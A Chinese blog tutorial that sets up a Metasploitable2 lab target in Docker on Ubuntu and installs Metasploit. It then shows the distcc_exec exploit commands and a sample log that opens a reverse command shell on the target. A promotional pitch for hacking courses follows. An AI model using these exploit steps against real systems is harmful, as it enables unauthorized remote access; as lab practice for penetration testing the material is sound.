体验一把黑客的感觉——Unbuntu下用docker搭一个肉鸡(Metasploitable)来练靶(渗透测试)

已于 2024-01-08 20:02:40 修改
阅读量746 收藏 6
点赞数
分类专栏: 网络安全 文章标签: docker linux 运维 黑客 渗透测试
于 2023-06-06 17:45:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74942241/article/details/131072939
版权

本文介绍在Unbuntu环境下用docker来简单快速地搭建起Metasploitable系统,并用Metasploit来进行渗透测试。
Metasploitable是一个供渗透测试用的、集成各种漏洞的Linux系统。
Metasploita则是一个集成各种漏洞攻击的渗透利器。

一. 安装docker

添加https证书

$ curl -fsSL https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu/gpg | sudo apt-key add -

添加仓库

$ sudo add-apt-repository "deb [arch=amd64] https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu $(lsb_release -cs) stable"

安装docker-ce

$ sudo apt-get install docker-ce -y

启动及设置开机自启(ubuntu 14以上版本)

$ sudo systemctl start docker

$ sudo systemctl enable docker

将用户添加到docker组,以后就能以非root身份运行docker了

$ sudo groupadd docker

$ sudo usermod -aG docker $USER

执行完之后可能要重新登录才能生效
检查是否安装成功

$ docker version

二. 安装Metasploitable

拉取metasploitable2镜像

$ docker pull tleemcjr/metasploitable2

运行metasploitable2容器

$ run --name mymetasploitable -it tleemcjr/metasploitable2:latest sh -c "/bin/services.sh && bash"

即可进入metasploitable2系统的命令行,执行$ uname -a可查看系统信息

三. 安装metasploit-framework

$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall

安装完成后执行$ msfconsole即可进入。

四. 进行渗透测试

进入msfconsole命令行窗口

$ msfconsole

docker肉鸡下用$ ifconfig查看ip,然后即可进行下面的测试。
以 exploit/unix/misc/distcc_exec 漏洞为例,

msf > use exploit/unix/misc/distcc_exec 
msf > set RHOST x.x.x.x(docker肉鸡ip)
msf > exploit

若渗透成功,则能成功取得肉鸡的shell控制,即可远程控制对方电脑。

msfconsole

msf > use exploit/unix/misc/distcc_exec 

msf  exploit(distcc_exec) > set RHOST 192.168.99.131

msf  exploit(distcc_exec) > exploit 

[*] Started reverse double handler

[*] Accepted the first client connection…

[*] Accepted the second client connection…

[*] Command: echo uk3UdiwLUq0LX3Bi;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets…

[*] Reading from socket B

[*] B: "uk3UdiwLUq0LX3Bi\r\n"

[*] Matching…

[*] A is input…

[*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:38897) at 2012-05-31 22:06:03 -0700

id

uid=1(daemon) gid=1(daemon) groups=1(daemon)

从靠劳力赚钱转变成靠脑力赚钱,想入门黑客的小白肯定想知道如何学好?

👉[[[CSDN大礼包:《黑客&网络安全入门&进阶学习资源》免费分享]]]安全链接,放心点击

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。(全套教程文末领取哈)
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述
这份完整版的学习资料已经上传CSDN,朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】

程序员小猴紫
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ubuntu安装kali linux工具,Ubuntu安装Kali Linux渗透测试工具
weixin_31448343的博客
05-05 4527
我想大多数Linux用户都听说过Kali Linux这个版本。它是一个非常好的用于渗透测试Linux发行版。但通常我们需要在电脑上安装一个完整的Kali Linux才能使用它各种各样的工具。LionSec开发出了一个python工具,叫做Katoolin,它可以让你在其他Linux发行版上使用Kali的全部工具。目前仅支持ubuntu,其他发行版会陆续支持。ubuntu如何安装Katoolin首...
Unbuntu学习3——充满bug的一天
01-09
是命令的一部分不能省略) 然后直接执行 sudo ./XXXX.py 2)使用语句 python3 xxxx.py 错误记录: error:没有权限 解决方案: chmod a+x anaconda3 #chmod all 加上 可执行权限 (sudo对conda是无效命令,故不使用...
Ubuntu安装Kali全套渗透测试工具教程
A1_3_9_7的博客
12-19 981
如果您“sudo”前面有“#”,则表示没有sudo权限。这个命令会安装Kali工具的所有分类。Katoolin是一个Python脚本,可用于在Ubuntu上安装Kali工具。安装完成后,就可以在Ubuntu使用Kali工具了。喜欢本文章的话请您高抬贵手。
记录Ubuntu下的一些渗透测试工具安装
12306小哥
01-07 1289
kali工具虽然很多,但常用的工具并不多,且kali上工具较多导致环境配置牵一发而动全身,故选择使用Ubuntu作为替代,以下内容为常见工具安装方法。
ubuntu安装 Metasploit
最新发布
keyboard专栏
04-12 785
Ubuntu系统上安装Metasploit Framework可以通过几种方法实现,其中一种是使用Rapid7提供的官方安装包,另一种是通过系统的包管理器。以下是使用官方安装脚本的步骤,这通常能确保你获得最新版本的Metasploit
实践代码教你学会 Metasploit 渗透攻击【Ubuntu版本】
weixin_45266856的博客
12-19 610
MSF是利用发现的安全漏洞或配置弱点对远程目标进行攻击,以植入和运行攻击载荷,从而获得对远程目标系统访问的一个代码模块。是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程。攻击载荷是渗透目标系统之后完成实际攻击功能的代码,用于在目标系统上运行任意命令或者执行特定代码。
Metasploitubuntu系统下的安装配置
子曰小玖的博客
08-06 831
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的有效性,并对审计目标的安全性进行评估,提供真正的有效的安全风险评估。 Metasploit目前主要是社区版metasploit framework和企业版metasploit pro,企业版为linux的bin文件和windows的二进制文件,一键式安装,就不多说,我们主要讲一下metaspl...
Mysql服务器的启动与停止(一)
09-11
safe_mysqld将标准出错设备从服务器重定位到数据目录下的一个出错文件,使得有它的一条记录。在启动服务器后,safe_mysqld也监视它并且如果它死掉则重启它。 3. 调用mysql.server脚本。这是一个通用的启动脚本,通过...
Ubuntu 16.04/18.04裸系统离线安装docker环境
02-05
在16.04和18.04上裸系统测试通过 使用流程 1.将 docker-engine_17.05.0_ce-0_ubuntu-trusty_amd64.deb libgcrypt20_1.8.1-4ubuntu1_amd64.deb libltdl7_2.4.6-2_amd64.deb libsystemd-journal0_204-5ubuntu20_...
ubuntu系统docker离线升级步骤及安装包
10-22
ubuntu系统docker离线升级步骤及安装包
dockerfile-msf:该Dockerfile构建了一个安装了Metasploit-Framework的基于Debian的Docker容器。 在任何设备上(包括Linux,MacOS或Windows)部署Metasploit的快速简便方法!
05-23
Metasploit框架dockerfile 目的 该Dockerfile构建了一个安装了Metasploit-Framework的基于Debian的Docker容器。 在任何设备上(包括Linux,MacOS或Windows)部署Metasploit的快速简便方法! MSF通过以下方式自动启动: 安装所有依赖项, 启动时自动更新, 与本地Postgres数据库的连接, 卷,以共享数据并访问您的自定义Metasploit脚本。 它还包括: tmux,在容器内使用多个窗口(msfconsole,shell等); nmap,著名的网络扫描仪(与ncat一起); nasm,以支持自定义编码器; 配置文件以在Metasploit中获得改进的提示,并带有时间戳和会话/作业状态。 用 该映像每天由Docker Hub构建,位于我的github存储库的Dockerfile上。 该
Metasploitable2机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
docker镜像-ubuntu16.04.3
01-23
仅44.5M大小的docker ubuntu镜像 完整的apt支持。使用方式:docker load -i ubuntu_16.04.3-image.tar.gz
python3 写一个WAV音频文件播放器的代码
12-31
环境:ubuntu 16.04 python3.5 pycharm 包 : wave pyaudio sys 上代码:AudioPlayer.py # coding:utf-8 # author:king # brief : 播放wav音频文件 import wave from pyaudio import PyAudio import sys ...
登录远程桌面时遇到“由于客户端检测到一个协议错误(代码0x1104)”
09-30
登录远程桌面时遇到“由于客户端检测到一个协议错误(代码0x1104)”,重新连接N次都还是这个错误提示,最后再重起电脑,还是没用。研究了一下错误终于解决了。
ubuntu下安装 kali linux 渗透工具
热门推荐
MyJDL的博客
09-22 2万+
相信用过linux系统的盆友都听说过kali linux 它是一个非常好的用于渗透测试Linux发行版。但是如何在ubuntu下使用kali linux渗透工具嘞!LionSec开发出了一个python工具,叫做Katoolin,它可以让你在其他Linux发行版上使用Kali的全部工具。目前仅支持ubuntu,其他发行版会陆续支持。很简单!     1、首先 ctrl+alt+T 打开终端
构建Metasploitable 场环境
cmcaimao的博客
04-17 1845
原文地址:https://github.com/rapid7/metasploitable3 Metasploitable3 Metasploitable3是从头开始构建的VM,具有大量安全漏洞。它旨在用作测试metasploit漏洞的目标。 Metasploitable3是在BSD风格的许可证下发布的。有关更多详细信息,请参见复制。 快速开始 要使用https://app.vag...
Metasploit渗透Ubuntu 12.04攻击测试演练
test_20140325的专栏
11-26 1407
转载FreeBuf.COM 这篇文章写来主要是一次娱乐性的练习。共享出攻击的细节,其中包括一些经过原作者修改过的各种来源的脚本文件。渗透的过程不是重点,之所以发出来最大的原因主要是文章后半部分维持持久化攻击的一些地方还是很值得学习的,顺便大家也可以再次熟悉一下MSF框架。希望对大家有所帮助。 攻击环境: Ubuntu12.04LTS 32bit(机,默认的软件安装配置) V
unbuntu如何把一个文件复制到当前目录下
07-13
您可以使用以下命令将文件复制到当前目录下: ``` cp /path/to/file . ``` 请将 "/path/to/file" 替换为您要复制的文件的实际路径。在命令末尾的句点 (.) 表示当前目录。 另外,您也可以使用以下命令进行复制: ``` cp /path/to/file $(pwd) ``` 这将使用 $(pwd) 获取当前目录的路径,并将文件复制到该目录下。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值